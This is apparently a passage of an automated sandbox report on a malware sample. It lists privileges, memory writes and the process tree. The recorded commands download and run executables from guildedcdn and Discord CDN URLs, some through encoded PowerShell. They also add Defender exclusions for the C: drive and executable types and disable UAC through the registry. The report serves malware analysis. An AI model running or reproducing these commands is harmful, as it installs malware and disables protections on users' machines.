Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\ChromeCrt.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\ChromeCrt.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zG.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3232 wrote to memory of 4272 N/A C:\Users\Admin\AppData\Local\Temp\resources.exe C:\Windows\SysWOW64\cmd.exe
PID 3232 wrote to memory of 4272 N/A C:\Users\Admin\AppData\Local\Temp\resources.exe C:\Windows\SysWOW64\cmd.exe
PID 3232 wrote to memory of 4272 N/A C:\Users\Admin\AppData\Local\Temp\resources.exe C:\Windows\SysWOW64\cmd.exe
PID 4272 wrote to memory of 220 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4272 wrote to memory of 220 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4272 wrote to memory of 220 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4272 wrote to memory of 1532 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4272 wrote to memory of 1532 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4272 wrote to memory of 1532 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4272 wrote to memory of 3392 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4272 wrote to memory of 3392 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4272 wrote to memory of 3392 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4272 wrote to memory of 2492 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4272 wrote to memory of 2492 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4272 wrote to memory of 2492 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4412 wrote to memory of 412 N/A C:\Windows\system32\OpenWith.exe C:\Windows\system32\NOTEPAD.EXE
PID 4412 wrote to memory of 412 N/A C:\Windows\system32\OpenWith.exe C:\Windows\system32\NOTEPAD.EXE
PID 4272 wrote to memory of 1256 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4272 wrote to memory of 1256 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4272 wrote to memory of 1256 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4272 wrote to memory of 4752 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4272 wrote to memory of 4752 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4272 wrote to memory of 4752 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4272 wrote to memory of 2484 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4272 wrote to memory of 2484 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4272 wrote to memory of 2484 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4272 wrote to memory of 2680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4272 wrote to memory of 2680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4272 wrote to memory of 2680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4272 wrote to memory of 1356 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\Music\RunNihaiersion.exe
PID 4272 wrote to memory of 1356 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\Music\RunNihaiersion.exe
PID 4272 wrote to memory of 1356 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\Music\RunNihaiersion.exe
PID 4272 wrote to memory of 3340 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4272 wrote to memory of 3340 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4272 wrote to memory of 3340 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1356 wrote to memory of 2216 N/A C:\Users\Public\Music\RunNihaiersion.exe C:\Windows\SysWOW64\cmd.exe
PID 1356 wrote to memory of 2216 N/A C:\Users\Public\Music\RunNihaiersion.exe C:\Windows\SysWOW64\cmd.exe
PID 1356 wrote to memory of 2216 N/A C:\Users\Public\Music\RunNihaiersion.exe C:\Windows\SysWOW64\cmd.exe
PID 2216 wrote to memory of 2156 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 2216 wrote to memory of 2156 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 2216 wrote to memory of 2156 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 2156 wrote to memory of 2196 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2156 wrote to memory of 2196 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2156 wrote to memory of 2196 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2216 wrote to memory of 5036 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\Music\israil.exe
PID 2216 wrote to memory of 5036 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\Music\israil.exe
PID 2216 wrote to memory of 5036 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\Music\israil.exe
PID 5036 wrote to memory of 3996 N/A C:\Users\Public\Music\israil.exe C:\Windows\SysWOW64\cmd.exe
PID 5036 wrote to memory of 3996 N/A C:\Users\Public\Music\israil.exe C:\Windows\SysWOW64\cmd.exe
PID 5036 wrote to memory of 3996 N/A C:\Users\Public\Music\israil.exe C:\Windows\SysWOW64\cmd.exe
PID 3996 wrote to memory of 1432 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3996 wrote to memory of 1432 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3996 wrote to memory of 1432 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4272 wrote to memory of 1436 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4272 wrote to memory of 1436 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4272 wrote to memory of 1436 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3996 wrote to memory of 2448 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3996 wrote to memory of 2448 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3996 wrote to memory of 2448 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4272 wrote to memory of 4472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 4272 wrote to memory of 4472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 4272 wrote to memory of 4472 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 4472 wrote to memory of 672 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4472 wrote to memory of 672 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\resources.exe

"C:\Users\Admin\AppData\Local\Temp\resources.exe"

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\942b40ad-7020-471a-9c95-e0a7b8aef8c5.bat

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/50b98ed3895545b2b72b28966cfa2b0d-Full.zip' -OutFile installer2.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/c0c5cf18ed5b12d0cf2e77312e553328-Full.zip' -OutFile uuac.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/b65cd9956dfe1877c72ffe687fc632b4-Full.zip' -OutFile israil.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/e000e033786867fa9caa5d9d6728384a-Full.zip' -OutFile israil2.exe"

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\VisualStudio.csproj

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/9947ba16f06abcff429e922c49790337-Full.zip' -OutFile bes.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/b00ef4b757bc25a0f41c3d74961ff9a0-Full.zip' -OutFile es.bat"

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/123bdf05b4b261644ff4579b8bd78806-Full.zip' -OutFile RunNihaiersion.exe"

C:\Users\Public\Music\RunNihaiersion.exe

RunNihaiersion.exe

C:\Windows\SysWOW64\timeout.exe

timeout /t 8

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\bes.bat" "

C:\Windows\SysWOW64\net.exe

net session

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 session

C:\Users\Public\Music\israil.exe

"C:\Users\Public\Music\israil.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\installer2.bat" "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Set-MpPreference -ExclusionExtension 'exe', 'dll', 'scr'"

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/05b73b535c4337c16fc3f039c1b30dc1-Full.zip' -OutFile RunihaiVersion.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Set-MpPreference -ExclusionPath 'C:\'"

C:\Users\Public\Music\RunihaiVersion.exe

RunihaiVersion.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\es.bat" "

C:\Windows\SysWOW64\net.exe

net session

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 session

C:\Users\Public\Music\israil2.exe

"C:\Users\Public\Music\israil2.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\uuac.bat" "

C:\Windows\SysWOW64\reg.exe

reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/d3e4bf5f503e63ca9f51a3c19c842b0d-Full.zip' -OutFile xx.exe"

C:\Windows\System32\NOTEPAD.EXE

"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\942b40ad-7020-471a-9c95-e0a7b8aef8c5.bat

C:\Users\Admin\AppData\Local\Temp\xx.exe

xx.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\nIoQkPR45i.exe

C:\Users\Admin\AppData\Local\Temp\nIoQkPR45i.exe

C:\Users\Admin\AppData\Local\Temp\nIoQkPR45i.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\AkW22FbGMd.exe

C:\Users\Admin\AppData\Local\Temp\AkW22FbGMd.exe

C:\Users\Admin\AppData\Local\Temp\AkW22FbGMd.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcwBhACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANgA3ADUANAAwADgAMQA2ADgAOQAwADMAMAAyADUANwA0AC8AMQAxADYANwA1ADQAMQAwADEAMQA0ADYANAAwADYAOQAyADkAMwAvAFcAaQBuAEQAZgB1AGwAdAAuAGUAeABlACcALAAgADwAIwBkAHgAaAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHkAcABsACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHoAcgBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADIAVwBpAG4ARABlAGYAYQB1AGwAdAAuAGUAeABlACcAKQApADwAIwB3AHkAYwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBqAGQAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwBqAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMgBXAGkAbgBEAGUAZgBhAHUAbAB0AC4AZQB4AGUAJwApADwAIwB2AHMAaQAjAD4A"

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\btFKrt23lt.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAZgBtACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAxADYANwA1ADQAMAA4ADEANgA4ADkAMAAzADAAMgA1ADcANAAvADEAMQA2ADcANQA0ADAAOQA4ADMAMQAyADMAMQA0ADgAOAAxADAALwBDAGgAcgBvAG0AZQBDAGUAcgB0AC4AZQB4AGUAJwAsACAAPAAjAGgAYwBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQB6AHkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcQBmAGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwBoAHIAbwBtAGUAQwByAHQALgBlAHgAZQAnACkAKQA8ACMAZQB2AGYAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcwBlAG4AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGEAdQBkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMAaAByAG8AbQBlAEMAcgB0AC4AZQB4AGUAJwApADwAIwBpAHEAbQAjAD4A"

C:\Users\Admin\AppData\Local\Temp\btFKrt23lt.exe

C:\Users\Admin\AppData\Local\Temp\btFKrt23lt.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\bYdDR2cBgy.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAdgB1ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANgA3ADUANAAwADgAMQA2ADgAOQAwADMAMAAyADUANwA0AC8AMQAxADYANwA1ADQAMQAxADkAMAA4ADEAMgA1ADEANgAzADkAMwAvAFYAaQBzAHUAYQBsAFMAdAB1AGQAaQBvAEMAZQByAHQALgBlAHgAZQAnACwAIAA8ACMAcQBmAHcAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBiAHcAegAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBzAGwAcwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAGkAcwB1AGEAbABTAHQAdQBkAGkAbwBvAC4AZQB4AGUAJwApACkAPAAjAG4AbABpACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGsAdwBtACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBrAHkAcAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAGkAcwB1AGEAbABTAHQAdQBkAGkAbwBvAC4AZQB4AGUAJwApADwAIwBxAHEAZwAjAD4A"

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\b59NC14x2O.exe

C:\Users\Admin\AppData\Local\Temp\bYdDR2cBgy.exe

C:\Users\Admin\AppData\Local\Temp\bYdDR2cBgy.exe

C:\Windows\system32\cmd.exe

"cmd" /C C:\Users\Admin\AppData\Local\Temp\9WGAk68UAP.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

